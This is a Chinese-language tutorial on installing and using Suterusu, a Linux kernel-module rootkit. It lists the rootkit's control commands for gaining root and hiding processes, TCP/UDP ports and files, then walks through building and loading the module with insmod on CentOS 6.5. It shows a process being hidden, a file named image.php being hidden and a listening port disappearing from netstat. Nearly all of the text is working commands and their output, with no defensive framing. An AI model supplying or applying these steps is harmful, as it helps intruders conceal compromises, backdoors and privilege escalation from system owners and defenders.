内核级rootkit Suterusu的安装与使用
下载地址:https://github.com/citypw/suterusu/
An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM
功能列表:
Get root
$ ./sock 0
Hide PID
$ ./sock 1[pid]
Unhide PID
$ ./sock 2[pid]
HideTCPv4 port
$ ./sock 3[port]
UnhideTCPv4 port
$ ./sock 4[port]
HideTCPv6 port
$ ./sock 5[port]
UnhideTCPv6 port
$ ./sock 6[port]
HideUDPv4 port
$ ./sock 7[port]
UnhideUDPv4 port
$ ./sock 8[port]
HideUDPv6 port
$ ./sock 9[port]
UnhideUDPv6 port
$ ./sock 10[port]
Hide file/directory
$ ./sock 11[name]
Unhide file/directory
$ ./sock 12[name]
在CentOS6.5 64位下测试:
1)
[root@vincent suterusu-master]# make linux-x86_64 KDIR=/lib/modules/$(uname -r)/build //注意这里是 linux-x86_64
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ " -C /lib/modules/2.6.32-642.1.1.el6.x86_64/build M=/tmp/suterusu-master modules
make[1]:Entering directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
CC [M] /tmp/suterusu-master/main.o
CC [M] /tmp/suterusu-master/util.o
CC [M] /tmp/suterusu-master/module.o
LD [M] /tmp/suterusu-master/suterusu.o
Building modules, stage 2.
MODPOST 1 modules
CC /tmp/suterusu-master/suterusu.mod.o
LD [M] /tmp/suterusu-master/suterusu.ko.unsigned
NO SIGN [M] /tmp/suterusu-master/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-642.1.1.el6.x86_64'
2)
[root@vincent suterusu-master]# gcc sock.c -o sock
sock.c:在函数‘main’中:
sock.c:205:警告:隐式声明与内建函数‘strlen’不兼容
sock.c:220:警告:隐式声明与内建函数‘strlen’不兼容
3)
[root@vincent suterusu-master]# insmod suterusu.ko
隐藏进程:
[root@vincent suterusu-master]#./sock 15542Hiding PID 5542
隐藏文件:
[root@vincent suterusu-master]#./sock 11image.phpHiding file/dir ../image.php
注意文件的隐藏只是针对文件名,也就是比如你想隐藏文件x,那么所有目录下的x都会被隐藏
隐藏连接:
[root@vincent suterusu-master]# netstat -ano | grep 49745
tcp 000.0.0.0:497450.0.0.0:* LISTEN off (0.00/0/0)
[root@vincent suterusu-master]#./sock 349745HidingTCPv4 port 49745
[root@vincent suterusu-master]# netstat -ano | grep 49745
[root@vincent suterusu-master]#